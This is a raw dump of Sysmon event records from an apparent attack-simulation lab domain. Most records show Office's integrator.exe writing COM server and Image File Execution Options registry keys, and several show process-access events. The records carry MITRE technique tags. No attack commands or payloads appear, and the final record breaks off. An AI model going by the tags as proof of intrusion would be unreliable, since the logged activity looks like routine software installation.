13241300x800000000000000071726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{97A2762C-403C-4953-A121-7A75ABCE4373}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{8D4F994C-EBBE-4F8D-BA4B-AE20CD36E72D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A1EB89D6-0A9C-4575-A0AE-654A990A454C}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{367E582C-F71C-4BF9-AA1B-9F62B793E9C5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6F3DD387-5AF2-492B-BDE2-30FF2F451241}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{CD7791B9-43FD-42C5-AE42-8DD2811F0419}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000071719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000071718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A0-0366-4F5C-9434-25CF162E475F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000071717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A0-0366-4F5C-9434-25CF162E475E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000071716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordconv.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excelcnv.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoxmled.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosync.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msqry32.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setlang.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\selfcert.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\graph.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clview.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E2F5480E-ED5A-4DDE-B8A8-F9F297479F62}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4693FF15-B962-420A-9E5D-176F7D4B8321}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9FBC2D8F-6F52-4CFA-A86F-096F3E9EB4B2}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F90DFE0C-CBDF-41FF-8598-EDD8F222A2C8}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{DDFE337F-4987-4EC8-BDE3-133FA63D5D85}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A98B233-3C59-4B31-944C-0E560D85E6C3}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.173{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4039B326-9F27-4B4A-B460-47A0C6A39D5C}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\MSGFILT.DLL 13241300x800000000000000071697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:55:55.173{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\Applications\WINWORD.EXE\shell\edit\command\(Default)"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "%%1" 13241300x800000000000000071696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 11241100x800000000000000071695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:55:55.141{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe2021-04-20 14:55:55.141 10341000x800000000000000071694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.048{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.032{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.032{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049863Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.574{85C0FFC9-EB7B-607E-DC06-00000000BB01}35041244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049862Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7B-607E-DC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049861Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049860Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049859Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049858Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049857Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049856Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049855Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049854Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049853Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 